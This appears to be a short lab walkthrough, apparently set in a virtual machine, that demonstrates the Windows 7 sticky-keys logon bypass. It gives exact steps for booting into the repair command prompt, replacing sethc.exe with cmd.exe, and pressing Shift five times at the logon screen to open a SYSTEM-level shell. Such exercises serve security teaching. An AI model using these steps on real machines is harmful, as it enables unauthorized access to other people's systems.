Task 1: Mount the OS and Enter the CMD

Step 1

• Use a Windows OS CD to boot Windows 7 over the existing Windows 7 OS.

Step 2

• Open the command prompt instead of installing the system.

1. Select “Repair your computer”
2. In the next screen, click Next to choose the Windows 7 operating system
3. Select “Command prompt”.

Task 2: Switch sethc.exe with cmd.exe

Step 1

• Find the local disks. Back up and replace the sethc.exe file at windows\system32 with cmd.exe.

wmic logicaldisk get name
D:
copy sethc.exe sethc2.exe
copy cmd.exe sethc.exe
yes

Step 2

• Restart the virtual machine from the command prompt and launch sethc.exe from the Windows logon screen. Note that cmd.exe opens, instead of sethc.exe with NT privileges.

1. Open the devices tab to unmount the disk image.
2. Type shutdown -r from the command prompt to restart.
3. After restarting the machine, press Shift five times.
4. Cmd.exe should open instead of sethc.exe
5. Type “whoami” and note that it says “nt authority\system”, which is the highest privileged user.